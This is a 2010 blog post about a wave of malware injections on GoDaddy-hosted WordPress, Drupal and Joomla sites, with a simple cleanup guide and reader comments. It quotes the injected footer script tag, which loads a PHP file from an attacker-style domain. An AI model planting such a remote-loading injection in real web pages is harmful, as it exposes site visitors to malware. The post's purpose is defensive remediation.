GoDaddy Wordpress, Drupal, Joomla Sites Hacked

Last week, in a series of attacks (this had also happened in april too) hundreds of godaddy sites got hacked and were injected a worm/virus/malware. The footers of all these sites are now showing this line

<script=”http://kdjkfjskdfjlskdjf.com/kp.php”></script>

If you have any anti virus software installed (which you always should) you will get a pop up warning like this

Removing this malware is not easy as it affects all php files, and since this happened on all kind of sites like wordpress, drupal, joomla and simple php files, it is difficult to give straight forward instructions for how to remove the malware virus from your files.

I have seen people who spent hours manually removing the code from all php files only to see later that they got affected again. Also upgrading the wordpress site to the latest version 2.9.2 doesn’t stop the virus getting spread too.

After looking on the web (check this and this post), it seems this hacking is going on for weeks now and though godaddy knows the issue, it is difficult to say what has been done. Earlier they said that this was caused due to wrong wordpress file permissions but since now drupal, joomla and any kind of php sites also got hacked, the problem seems to be with godaddy only.

Anyway if you are having the problem with this malware/virus/trojan, here is a guide to remove the virus

1. Backup your database and all files. You can backup your database through godaddy control panel for your site. Download the database in sql format and see it is indeed correct database. You can download files using any ftp program, it is alright if they are the affected files, just download it.

2. Now godaddy has File History option, click on it and move back to 30th April (or whenever your site got hacked) or slightly before and restore your older files. Do it for all the files.

3. Now disable the plugins (do note down any changes if u had made in them) and custom themes, upgrade your wordpress files, then upgrade the theme and than the plugins. Do not use any outdated files.

This should solve the problem for you, it is indeed some time consuming and ideally godaddy should clean their servers rather than wasting thousands of user hours.

Related posts:

  1. Convert wordpress site into Drupal If you owns a wordpress website or a blog and...
  2. 3 Best Wordpress Security Plugins As long as your wordpress files are up to date...
  3. Get Wordpress Feed into Drupal If you see the front page of MWolk, you should...
  4. Make money with Drupal Sites and inLinks If you owns a drupal site and are looking...
  5. Latest Working Godaddy Coupons You can always get as much as 20% discount on...


Liked this post ? Subscribe to MWolk Blog via RSS Feed or via Email and receive free daily Tech and Money making tips.

4 Responses to “GoDaddy Wordpress, Drupal, Joomla Sites Hacked”

Share/Save/Bookmark Send a Trackback Write a Response

  1. 1Mommy D on May 12, 2010 :

    So I woke up this morning and turned on my computer. Going through the latest RSS feeds I subscribe to. While drinking a cup of coffee I read your post. Thinking of course that my site surely wouldn’t be effected.

    Well, guess what? Yup! At 3.15 am last night ALL my PHP files got hit. When I went to my site I got a trojan warning. GRRRR. So my site is shut down for the time being while I work this all out.

    Thank you for this info! Your post is proving to be a great help. I shared it on facebook and twitter. Hope I can’t get things back up to speed soon!

    Thanks again!!

    Mommy D

  2. 2Ron on May 30, 2010 :

    See http://www.digitaldrake.com/wordpress-hack-cleanup-solution/

    Hope this helps.

  3. 3Eric on Jun 11, 2010 :

    Thank you for sharing this informative, detailed, and more than slightly depressing information.

Trackbacks / Pingbacks:

  1. The Boutique Hoster » Web site security for the common man

    Pingback on Jul 13, 2010 at 10:30 pm

Leave a Reply

Name Email Website URI